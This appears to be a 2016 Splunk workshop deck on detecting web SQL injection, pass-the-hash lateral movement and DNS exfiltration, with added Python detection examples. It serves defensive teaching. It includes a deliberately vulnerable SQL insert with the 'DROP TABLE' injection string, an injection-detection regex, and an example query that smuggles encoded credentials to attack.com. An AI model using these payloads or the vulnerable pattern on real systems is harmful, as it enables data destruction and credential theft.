Splunk Enterprise for InfoSec Hands-On
Security Hands-On: What’s Your Sign?

Aquarius – 01
Pisces (A~M) – 02
Pisces (N~Z) – 03
Aries – 04
Taurus (A~M) – 05
Taurus (N~Z) – 06
Gemini (A~M) – 07
Gemini (N~Z) – 08
Cancer (A~M) – 09
Cancer (N~Z) – 10
Leo – 11
Virgo (A~M) – 12
Virgo (N~Z) – 13
Libra (A~M) – 14
Libra (N~Z) – 15
Scorpio (A~M) – 16
Scorpio (N~Z) – 17
Sagittarius – 18
Capricorn (A~M) – 19
Capricorn (N~Z) – 20

https://od-splunklivesantaclara-XX.splunkoxygen.com
Username: splunklive
Password: security
Copyright © 2016 Splunk Inc.
Splunk Enterprise for Information Security
Hands-On Santa Clara | November 10, 2016
Presenters: Chris Shobert & Lily Lee
Safe Harbor Statement
During the course of this presentation, we may make forward-looking statements regarding future events or the expected performance of the company. We caution you that such statements reflect our current expectations and estimates based on factors currently known to us and that actual events or results could differ materially. For important factors that may cause actual results to differ from those contained in our forward-looking statements, please review our filings with the SEC. The forward-looking statements made in this presentation are being made as of the time and date of its live presentation. If reviewed after its live presentation, this presentation may not contain current or accurate information. We do not assume any obligation to update any forward-looking statements we may make. In addition, any information about our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only and shall not be incorporated into any contract or other commitment. Splunk undertakes no obligation either to develop the features or functionality described or to include any such feature or functionality in a future release.
Agenda
Intro
Web Attacks
Lateral Movement
DNS Exfiltration
Wrap-up / Q&A
Intro
Machine data contains a definitive record of all interactions
Splunk is a very effective platform to collect, store, and analyze all of that data
[Slide diagram: Platform for Machine Data. Data sources shown: human-to-machine and machine-to-machine interactions, Mainframe Data, Relational Databases, Mobile, Forwarders, Syslog/TCP/Other, Sensors & Control Systems, Wire Data. Splunk Solutions > Easy to Adopt, across data sources, use cases & consumption models. Splunk Premium Solutions & Apps: ITSI (IT Svc Int), UBA. Rich ecosystem of apps: VMware, Exchange, PCI, Security, Cisco, PAN, SNOW, AWS.]
Splunk Positioned as a Leader in Gartner 2016 Magic Quadrant for Security Information and Event Management*
• Four years in a row as a leader
• Furthest overall in Completeness of Vision
• Splunk also scores highest in 2016 Critical Capabilities for SIEM report in all three use cases
*Gartner, Inc., 2016 Magic Quadrant for Security Information and Event Management, and Critical Capabilities for Security Information and Event Management, Oliver Rochford, Kelly M. Kavanagh, Toby Bussa. 10 August 2016. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Splunk. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
Gartner Critical Capabilities for SIEM
1. Basic Security Monitoring
2. Advanced Threat Detection
3. Forensics & Incident Response
Web Attacks
OWASP 2013 Top 10
[10] Unvalidated redirects and forwards
[9] Using components with known vulnerabilities
[8] Cross-site request forgery
[7] Missing function level access control
[6] Sensitive data exposure
[5] Security misconfiguration
[4] Insecure direct object reference
[3] Cross-site scripting (XSS)
[2] Broken authentication and session management
[1] Injection: SQL injection, Code injection, OS commanding, LDAP injection, XML injection, XPath injection, SSI injection, IMAP/SMTP injection, Buffer overflow
Why did I get breached?
SQLi has been around a very, very long time…
Source: Imperva Web Attacks Report, 2015
TalkTalk: PII/financial data for 4M customers
VTech: PII for 5M adults + kids
…and so far this year… 45
Little Bobby Tables
Why Did Bobby’s School Lose Their Records?

    $sql = "INSERT INTO Students (Name) VALUES ('" . $studentName . "');";
    execute_sql($sql);

Step 1: $studentName = John
Step 2: INSERT INTO Students (Name) VALUES ('John');

Step 1: $studentName = Robert'); DROP TABLE Students;--
Step 2: INSERT INTO Students (Name) VALUES ('Robert'); DROP TABLE Students;--');
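Added example, not code from the deck: the slide's string concatenation reproduced in Python on SQLite, beside the parameterized form that stores Bobby's name as plain data. executescript() is assumed to play the role of the slide's execute_sql(), a driver that runs stacked statements.

```python
import sqlite3

# Constructed input, the "Little Bobby Tables" student name from the slide.
BOBBY = "Robert'); DROP TABLE Students;--"


def fresh_db():
    """In-memory SQLite database holding the slide's Students table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Students (Name TEXT)")
    return conn


def table_exists(conn):
    row = conn.execute(
        "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='Students'"
    ).fetchone()
    return row[0] == 1


def insert_vulnerable(conn, student_name):
    """Mirrors the PHP on the slide: the name is glued into the SQL text.
    executescript() stands in for execute_sql(): a driver that accepts
    stacked statements, which is what lets the DROP TABLE run.
    Returns whether the Students table still exists afterwards."""
    sql = "INSERT INTO Students (Name) VALUES ('" + student_name + "');"
    conn.executescript(sql)
    return table_exists(conn)


def insert_safe(conn, student_name):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    conn.execute("INSERT INTO Students (Name) VALUES (?)", (student_name,))
    return table_exists(conn)


def stored_names(conn):
    return [r[0] for r in conn.execute("SELECT Name FROM Students")]


if __name__ == "__main__":
    c = fresh_db()
    print("table survives vulnerable insert:", insert_vulnerable(c, BOBBY))  # False
    c = fresh_db()
    print("table survives safe insert:", insert_safe(c, BOBBY))              # True
    print(stored_names(c))  # the whole string is stored literally as a name
```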
Let’s get hands-on!
A Little About Our Environment
Our learning environment consists of ~5.5M events, from real environments, but sanitized:
• Windows Security events
• Apache web access logs
• Bro DNS & HTTP
• Palo Alto traffic logs
• Some other various bits
Are You a Newbie or Ninja?
Let’s get hands-on!
Web Attacks
https://splunkbase.splunk.com/app/1528/
Search for possible SQL injection in your events:
• looks for patterns in the URI query field to see if anyone has injected them with SQL statements
• uses standard deviations that are 2.5 times greater than the average length of your URI query field
Macros used
• sqlinjection_pattern(sourcetype, uri query field)
• sqlinjection_stats(sourcetype, uri query field)
`sqlinjection_rex` is a search macro. It contains:

    (?<injection>(?i)select.*?from|union.*?select|\'$|delete.*?from|update.*?set|alter.*?table|([\%27|\'](%20)*=(%20)*[\%27|\'])|\w*[%27|\']or)

Which means: in the string we are given, look for ANY of the following matches and put that into the “injection” field.
• Anything containing SELECT followed by FROM
• Anything containing UNION followed by SELECT
• Anything with a ' at the end
• Anything containing DELETE followed by FROM
• Anything containing UPDATE followed by SET
• Anything containing ALTER followed by TABLE
• A %27 OR a ', then any number of %20, an =, any number of %20, and then a %27 OR a '
• Any amount of word characters followed by a %27 OR a ' and then “or”
Note: %27 is encoded “'” and %20 is encoded <space>
Regular Expressions FTW
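Added example, not from the deck or the app: the sqlinjection_rex pattern ported to Python and run over constructed URI query values. Python spells the named group (?P<injection>...) and wants (?i) at the front; the rest is the slide's pattern unchanged. The bracketed parts are character classes, so the digits 2 and 7 and the pipe each count as a quote character, which is why the benign-looking cat=2order matches.

```python
import re

# The sqlinjection_rex pattern from the slide, ported to Python's re module:
# the named group is spelled (?P<...>) and the (?i) flag is moved to the front
# (Python 3.11+ rejects a global flag elsewhere). Everything else is verbatim.
SQLI_RE = re.compile(
    r"(?i)(?P<injection>select.*?from|union.*?select|'$|delete.*?from"
    r"|update.*?set|alter.*?table|([%27|'](%20)*=(%20)*[%27|'])|\w*[%27|']or)"
)


def find_injection(uri_query):
    """Return the text captured in the 'injection' field, or None if no match."""
    m = SQLI_RE.search(uri_query)
    return m.group("injection") if m else None


# Constructed sample URI query strings with the expected capture for each.
SAMPLES = {
    "q=select+name+from+users": "select+name+from",   # SELECT ... FROM
    "id=1%27%20or%20%271%27=%271": "7=%",             # quote, '=', quote alternative
    "name=Robert'": "'",                              # quote at end of string
    "page=2&sort=name": None,                         # benign
    "cat=2order": "2or",                              # false positive: '2' is in [%27|']
}


def scan(samples):
    """Run the macro's pattern over every sample: query -> captured text or None."""
    return {q: find_injection(q) for q in samples}


if __name__ == "__main__":
    for query, hit in scan(SAMPLES).items():
        print(f"{query!r:40} -> {hit!r}")
```

When tuning this macro, the last alternative is the one to watch: any word ending in a 2 or 7 followed by "or" fires it.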
Bonus: Try out the SQL Injection Search app!
Summary: Web Attacks / SQL Injection
• SQL injection provides attackers with easy access to data
• Detecting advanced SQL injection is hard – use an app!
• Understand where SQLi is happening on your network and put a stop to it
• Augment your WAF with enterprise-wide Splunk searches
Lateral Movement
Poking Around
An attacker hacks a non-privileged user system.
So what?
Lateral Movement
Lateral Movement is the expansion of systems controlled, and data accessed.
Most Famous Lateral Movement Attack? (excluding password re-use)
Pass the Hash!
This and other techniques used in destructive Sands breach…
…and at Sony, too.
Detecting Legacy PtH
Look for Windows Events:
• Event ID: 4624 or 4625
• Logon type: 3
• Auth package: NTLM
• User account is not a domain logon, or Anonymous Logon
…this is trivially easy in Splunk
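Added example, not from the deck: the four legacy PtH conditions applied to constructed Windows Security events. The field names (EventCode, Logon_Type, Authentication_Package, Account_Name, Account_Domain) follow Splunk's Windows event extractions, and the domain name CORP is an assumption for this sample environment.

```python
# Constructed Windows Security events in the shape Splunk extracts from
# EventCode 4624/4625 (not real log data). Assumed AD domain: CORP.
DOMAIN = "CORP"

EVENTS = [
    {"EventCode": 4624, "Logon_Type": 3, "Authentication_Package": "NTLM",
     "Account_Name": "jsmith", "Account_Domain": "WS-0042", "src": "10.0.5.17"},
    {"EventCode": 4624, "Logon_Type": 3, "Authentication_Package": "Kerberos",
     "Account_Name": "jsmith", "Account_Domain": "CORP", "src": "10.0.5.17"},
    {"EventCode": 4625, "Logon_Type": 3, "Authentication_Package": "NTLM",
     "Account_Name": "ANONYMOUS LOGON", "Account_Domain": "NT AUTHORITY",
     "src": "10.0.9.3"},
    {"EventCode": 4624, "Logon_Type": 10, "Authentication_Package": "NTLM",
     "Account_Name": "admin", "Account_Domain": "WS-0099", "src": "10.0.1.2"},
    {"EventCode": 4624, "Logon_Type": 3, "Authentication_Package": "NTLM",
     "Account_Name": "svc_backup", "Account_Domain": "CORP", "src": "10.0.7.7"},
]


def is_legacy_pth(ev, domain=DOMAIN):
    """Apply the slide's four conditions to one event."""
    if ev["EventCode"] not in (4624, 4625):
        return False
    # Network logon (type 3) authenticated with NTLM rather than Kerberos.
    if ev["Logon_Type"] != 3 or ev["Authentication_Package"].upper() != "NTLM":
        return False
    # Either an anonymous logon or an account that is not a domain account
    # (local accounts show the workstation name as Account_Domain).
    anonymous = ev["Account_Name"].upper() == "ANONYMOUS LOGON"
    non_domain = ev["Account_Domain"].upper() != domain.upper()
    return anonymous or non_domain


def suspicious_logons(events):
    """(src, DOMAIN\\user) pairs for matching events, ready to pivot on."""
    return [(e["src"], f'{e["Account_Domain"]}\\{e["Account_Name"]}')
            for e in events if is_legacy_pth(e)]


if __name__ == "__main__":
    for src, account in suspicious_logons(EVENTS):
        print(f"possible legacy PtH: {account} from {src}")
```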
Let’s get hands-on!
Lateral Movement: Legacy
Then It Got Harder
• Pass the Hash tools have improved
• Tracking of jitter, other metrics
• So let’s detect lateral movement differently
Network Traffic Provides Source of Truth
I usually talk to 10 hosts
Then one day I talk to 10,000 hosts
ALARM!
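Added example, not from the deck: the "10 hosts, then one day 10,000 hosts" baseline written out over constructed connection records. The per-day grouping and the 10x threshold are assumptions; the slide only says ALARM!

```python
from collections import defaultdict

# Constructed (src, dst, day) connection records, not real traffic:
# 10.0.5.17 talks to the same 10 hosts on days 1-5, then 10,000 hosts on day 6;
# 10.0.5.18 talks to the same 12 hosts every day.
CONNECTIONS = (
    [("10.0.5.17", f"10.0.20.{i}", d) for d in range(1, 6) for i in range(1, 11)]
    + [("10.0.5.17", f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}", 6)
       for i in range(1, 10001)]
    + [("10.0.5.18", f"10.0.21.{i}", d) for d in range(1, 7) for i in range(1, 13)]
)


def distinct_peers_per_day(connections):
    """src -> {day: number of distinct destination hosts that day}."""
    seen = defaultdict(lambda: defaultdict(set))
    for src, dst, day in connections:
        seen[src][day].add(dst)
    return {s: {d: len(h) for d, h in days.items()} for s, days in seen.items()}


def fan_out_alarms(connections, today, factor=10):
    """Alarm when a host's distinct peers on `today` exceed `factor` times the
    average of its earlier days (assumed threshold).
    Returns (src, peers_today, baseline) tuples."""
    alarms = []
    for src, per_day in distinct_peers_per_day(connections).items():
        history = [n for d, n in per_day.items() if d < today]
        if today not in per_day or not history:
            continue  # nothing seen today, or no baseline to compare against
        baseline = sum(history) / len(history)
        if per_day[today] > factor * baseline:
            alarms.append((src, per_day[today], baseline))
    return alarms


if __name__ == "__main__":
    for src, peers, base in fan_out_alarms(CONNECTIONS, today=6):
        print(f"ALARM: {src} reached {peers} hosts, baseline {base:.1f}")
```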
Let’s get hands-on!
Lateral Movement: Network Traffic
iz so hard… u haz magic?
Come see… at the demo booths
UBA
Summary: Lateral Movement
• Attacker success defines scope of a breach
• High difficulty, high importance
• Worth doing in Splunk
• Easy with UBA
DNS Exfiltration

domain=corp;user=dave;password=12345
    ↓ encrypt (the slide's payload is base64-encoded)
DNS Query: ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com

DNS exfil tends to be overlooked within an ocean of DNS data.
Let’s fix that!
DNS Exfiltration
FrameworkPOS: a card-stealing program that exfiltrates data from the target’s network by transmitting it as domain name system (DNS) traffic
“But the big difference is the way how stolen data is exfiltrated: the malware used DNS requests!”
https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests
“…few organizations actually keep detailed logs or records of the DNS traffic traversing their networks — making it an ideal way to siphon data from a hacked network.”
http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/#more-30872
DNS Exfiltration
https://splunkbase.splunk.com/app/2734/
DNS exfil detection – tricks of the trade
• parse URLs & complicated TLDs (Top Level Domain)
• calculate Shannon Entropy
List of provided lookups
• ut_parse_simple(url)
• ut_parse(url, list) or ut_parse_extended(url, list)
• ut_shannon(word)
• ut_countset(word, set)
• ut_suites(word, sets)
• ut_meaning(word)
• ut_bayesian(word)
• ut_levenshtein(word1, word2)
Shannon Entropy
Layman’s definition: a score reflecting the randomness or measure of uncertainty of a string
Examples
• The domain aaaaa.com has a Shannon Entropy score of 1.8 (very low)
• The domain google.com has a Shannon Entropy score of 2.6 (rather low)
• A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com has a Shannon Entropy score of 3 (rather high)
Detecting Data Exfiltration

    index=bro sourcetype=bro_dns | `ut_parse(query)` | `ut_shannon(ut_subdomain)` | eval sublen=length(ut_subdomain) | table ut_domain ut_subdomain ut_shannon sublen

TIPS
• Leverage our Bro DNS data
• Calculate Shannon Entropy scores
• Calculate subdomain length
• Display Details
Let’s get hands-on!
Lateral Movement: DNS Exfiltration
Detecting Data Exfiltration

    … | stats count avg(ut_shannon) as avg_sha avg(sublen) as avg_sublen stdev(sublen) as stdev_sublen by ut_domain | search avg_sha>3 avg_sublen>20 stdev_sublen<2

TIPS
• Leverage our Bro DNS data
• Calculate Shannon Entropy scores
• Calculate subdomain length
• Display count, scores, lengths, deviations
Detecting Data Exfiltration: RESULTS
• Exfiltrating data requires many DNS requests – look for high counts
• DNS exfiltration to mooo.com and chickenkiller.com
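Added example that is not part of the deck or of URL Toolbox: ut_shannon and the two search pipelines above (per-query scoring, then the stats/search over avg_sha, avg_sublen and stdev_sublen by domain) ported to Python and run over constructed Bro DNS query names. split_query is a simplified stand-in for ut_parse (last two labels are taken as the domain; no public-suffix list), and the base64 chunks are cut from the slide's own example payload.

```python
import math
from collections import Counter, defaultdict
from statistics import mean, stdev

# Constructed Bro DNS query names: ordinary lookups plus four queries whose
# subdomains are 28-character base64 chunks (cut from the slide's payload).
QUERIES = [
    "www.google.com", "mail.google.com", "drive.google.com",
    "cdn.example.com", "api.example.com",
    "ZG9tYWluPWNvcnA7dXNlcj1kYXZl.mooo.com",
    "O3Bhc3N3b3JkPTEyMzQ1DQoNCg==.mooo.com",
    "dXNlcj1kYXZlO3Bhc3N3b3JkPTEy.mooo.com",
    "MzQ1DQoNCg==ZG9tYWluPWNvcnA7.mooo.com",
]


def ut_shannon(word):
    """Shannon entropy in bits per character over the string's characters.
    Reproduces the slide's scores: aaaaa.com -> 1.88, google.com -> 2.65."""
    n = len(word)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(word).values())


def split_query(query):
    """Simplified ut_parse: (ut_domain, ut_subdomain) from a query name."""
    labels = query.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def exfil_candidates(queries, min_sha=3.0, min_sublen=20, max_stdev=2.0):
    """stats count avg(ut_shannon) avg(sublen) stdev(sublen) by ut_domain,
    then search avg_sha>3 avg_sublen>20 stdev_sublen<2 (thresholds from the deck)."""
    by_domain = defaultdict(list)
    for q in queries:
        domain, sub = split_query(q)
        by_domain[domain].append((ut_shannon(sub), len(sub)))
    hits = {}
    for domain, rows in by_domain.items():
        shas, lens = zip(*rows)
        sd = stdev(lens) if len(lens) > 1 else 0.0  # Splunk reports 0 for one value
        if mean(shas) > min_sha and mean(lens) > min_sublen and sd < max_stdev:
            hits[domain] = {"count": len(rows), "avg_sha": round(mean(shas), 2),
                            "avg_sublen": mean(lens), "stdev_sublen": sd}
    return hits
```

Steady subdomain length with near-zero deviation is the tell: chunked encoders emit fixed-size labels, while real subdomains vary in length.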
Summary: DNS Exfiltration
• Exfiltration by DNS and ICMP is a very common technique
• Many organizations do not analyze DNS activity – do not be like them!
• No DNS logs? No Splunk Stream? Look at FW byte counts
Wrap-up / Q&A
Summary
• Multiple phases to modern attacks
• Deploy detection across all phases
• Also consider adaptive response!
• Stay abreast of modern advancements
Today’s content (PDF):
https://splunk.box.com/v/SplunkLive-Security-Handout
• 5,000+ IT and Business Professionals
• 175+ Sessions
• 80+ Customer Speakers
PLUS Splunk University
• Three days: Sept 23-25, 2017
• Get Splunk Certified for FREE!
• Get CPE credits for CISSP, CAP, SSCP
SEPT 25-28, 2017 | Walter E. Washington Convention Center, Washington, D.C. | CONF.SPLUNK.COM
The 8th Annual Splunk Worldwide Users’ Conference
Thank You